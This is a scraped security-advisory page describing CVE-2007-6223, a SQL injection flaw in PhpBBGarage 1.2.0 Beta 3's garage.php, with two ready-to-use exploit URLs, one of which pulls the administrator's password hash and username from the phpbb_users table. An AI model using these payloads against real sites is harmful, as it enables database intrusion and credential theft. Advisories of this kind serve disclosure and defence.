about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PhpBBGarage Garage.PHP SQL Injection Vulnerability


Title PhpBBGarage Garage.PHP SQL Injection Vulnerability
Published 2007-12-03-12:00AM
Updated 2008-03-13-02:51PM
Class Input Validation Error
CVE   CVE-2007-6223
Remote  Yes
Local  No
Credit  maku234 is credited with the discovery of this vulnerability.
Vulnerable  PhpBBGarage PhpBBGarage 1.2.0 Beta 3
Not Vulnerable  
Code  Attackers can use a browser to exploit this issue.The following URIs are available: http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
http://www.example.com/garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 20:58:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Kayako 123.dscm.c mambo+Remo 200 /compo sexgrup.co XNXX.COMM phpbb 2.0 3g7788.com Girl clips xtrac.cgi 200 /compo www.toucai pamla ande Asvar pornolar www.com.pk HM-Portal+ nackedwome CVE-2006-1 www.cnad56 admin/?op= video porn 200 /compo 1.3.37 apa XNX 200 /compo gaysexwall 200 /compo hman soros girls sex 200 /compo OpenSSH_4. news nacke sexy girl bigdeal-pr Tayang kn 200 /compo www.iranxi dav board forumKIT 1 Vidio porn news for c 3gp xxx vi tobeijing. 200 /compo sexygirl.c Lalat x.co xxs+guestb www.sexly Girl boy s